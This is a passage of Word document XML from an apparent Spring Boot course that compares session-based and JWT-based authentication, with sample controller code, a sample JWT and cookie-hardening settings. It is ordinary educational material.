          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Instant invalidation — delete the session and the user is logged out immediately (critical for banking and healthcare)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rich server-side control — you can store complex objects, track activity, enforce timeout policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fine-grained security — Spring Security integrates deeply with session management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Disadvantages of Stateful Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Horizontal scaling challenges — sessions are stored in memory on a specific server instance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Memory consumption — each active user consumes server memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Session affinity (sticky sessions) needed — the load balancer must send each user to the same server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Not ideal for stateless REST APIs or microservices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thick" w:color="F59E0B" w:sz="16"/>
              <w:bottom w:val="single" w:color="F59E0B" w:sz="6"/>
              <w:right w:val="single" w:color="F59E0B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3C7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F59E0B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  The Horizontal Scaling Problem</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The Scaling Problem: Imagine you have 3 servers. John logs in and his session is created on Server #2. The load balancer routes his next request to Server #3. Server #3 has no idea who John is — his session is on Server #2. John appears to be logged out! This is why Spring Session with Redis (covered in Module 3) is essential in multi-server deployments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Stateless Architecture (JWT-Based)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In a stateless architecture, the server maintains no memory about users. Instead, after login, the server issues the user a self-contained token (a JSON Web Token, or JWT) that contains all the information needed to identify the user. The client stores this token and sends it with every request. The server verifies the token's signature — no database lookup required.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thick" w:color="1E40AF" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E40AF" w:sz="6"/>
              <w:right w:val="single" w:color="1E40AF" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DBEAFE" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E40AF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">💡  Analogy — JWT as a Passport</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The Passport Analogy: Instead of the hotel keeping a file on you, imagine you carry a passport issued by a trusted government authority. The passport contains all your information (name, nationality, expiry) and a tamper-proof stamp. At any hotel anywhere in the world, you show your passport. The hotel verifies it's authentic and serves you. The hotel stores nothing about you. Your identity is self-contained in the document you carry.</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JWT Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A JWT consists of three Base64-encoded parts separated by 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eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9     ← Header (algorithm)</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.eyJ1c2VySWQiOjQyLCJyb2xlIjoiQ1VTVE9NRVIifQ ← Payload (your data)</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.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c ← Signature (tamper-proof)</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Decoded Payload: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"userId": 42,</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"role":   "CUSTOMER",</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"email":  "john@securebank.com",</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"exp":    1700000000   // Expiry timestamp</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bl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When the server receives a JWT, it does NOT look up a database. It mathematically verifies the signature using the server's secret key. If the signature is valid, the payload data is trusted. If even one character of the payload was altered, the signature verification fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Advantages of Stateless Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Perfect horizontal scalability — any server can verify any token; no shared state needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ideal for microservices — each service independently verifies the token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No server memory consumed per user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Works naturally with mobile apps and cross-origin API calls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Disadvantages of Stateless Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cannot instantly invalidate tokens — a token is valid until it expires, even if the user is banned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Token grows large as more claims are added — sent on every request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If the secret key is compromised, all tokens are compromised</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">More complex to implement correctly (refresh tokens, key rotation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stateful vs Stateless —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3400"/>
        <w:gridCol w:w="3400"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Factor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Choose Stateful (Sessions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:left w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="CBD5E1" w:sz="1"/>
              <w:right w:val="single" w:color="CBD5E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A2B4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Choose Stateless (JWT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Traditional monolithic MVC app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Microservices, REST APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Instant logout?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Yes — delete the session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Only at token expiry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Horizontal scaling?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Requires shared session store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Native — no coordination</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Mobile clients?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Awkward — cookies tricky</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Natural — just send token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Real-time access control?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Check session on every request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Cannot revoke mid-session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Use case example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Banking, healthcare, e-commerce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Mobile API, microservices, SaaS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D9488" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Module 3: Session Handling in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we understand the theory of stateful architecture, let's get into the concrete implementation — how Spring Boot actually creates, manages, and destroys sessions using the HttpSession API, and how Spring Session extends this to work across multiple server instances.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 The HttpSession API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Boot (running on embedded Tomcat) provides the HttpSession interface — a simple key-value store that lives in the server's memory (JVM heap). When a user logs in, you store their information in this session. Every subsequent request from the same user retrieves the same session object.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D9488"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Session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@Controller</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public class AuthController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@PostMapping("/login")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public String login(@RequestParam String username,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@RequestParam String password,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HttpSession session) {   // Spring auto-injects this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User user = userService.authenticate(username, password);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if (user != null)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Store user info in session — acts like a Map</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session.setAttribute("userId",   user.getId());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session.setAttribute("username", user.getUsername());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session.setAttribute("role",     user.getRole());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session.setMaxInactiveInterval(1800); // 30-minute timeout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return "redirect:/dashboard";   // PRG pattern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return "redirect:/login?error=true";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@GetMapping("/dashboard")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public String dashboard(HttpSession session, Model model)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Retrieve from session — returns null if not logged in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String username = (String) session.getAttribute("username");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if (username == null)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return "redirect:/login"; // Not authenticated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model.addAttribute("username", username);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return "dashboard";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@PostMapping("/logout")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public String logout(HttpSession session)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session.invalidate(); // Deletes the session completely</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return "redirect:/login";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The JSESSIONID Cookie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a session is created, Tomcat automatically generates a unique session ID and sends it to the browser as a cookie. This happens completely transparently — you never write any cookie-handling code yourself.</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Server Response Header (automatic — you don't write this):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Set-Cookie: JSESSIONID=A1B2C3D4E5F6G7H8; Path=/; HttpOnly; Secure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Browser sends on every subsequent request (automatic):</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Cookie: JSESSIONID=A1B2C3D4E5F6G7H8</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Session Security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application.properties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Session timeout (default is 30 minutes)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server.servlet.session.timeout=30m</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JavaScript CANNOT read this cookie (blocks XSS attacks)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server.servlet.session.cookie.http-only=true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Only send cookie over HTTPS (prevents man-in-the-middle attacks)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server.servlet.session.cookie.secure=true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Prevent cross-site request forgery (CSRF) attacks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server.servlet.session.cookie.same-site=strict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Custom cookie name (optional — default is JSESSIONID)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server.servlet.session.cookie.name=BANK_SESSION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thick" w:color="991B1B" w:sz="16"/>
              <w:bottom w:val="single" w:color="991B1B" w:sz="6"/>
              <w:right w:val="single" w:color="991B1B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="FEE2E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
